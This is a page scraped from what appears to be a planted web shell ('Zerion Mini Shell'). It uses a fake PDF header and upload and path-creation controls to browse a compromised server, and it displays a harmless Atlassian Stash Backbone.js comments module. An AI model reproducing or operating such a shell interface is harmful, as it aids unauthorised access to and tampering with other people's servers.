%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/data/old/home/stash/atlassian-stash/static/feature/comments/
Upload File :
Create Path :
Current File : //proc/self/root/data/old/home/stash/atlassian-stash/static/feature/comments/comment-collection.js

define('feature/comments/comment-collection', [
    'backbone',
    'feature/comments/comment-model',
    'util/navbuilder'
], function (
    Backbone,
    Comment
) {

    "use strict";

    return Backbone.Collection.extend({
        initialize : function(models, options) {
            options = options || {};
            this.anchor = options.anchor;
        },
        model : Comment,
        url : function() {
            return this.anchor.urlBuilder().build();
        }
    });
});

Zerion Mini Shell 1.0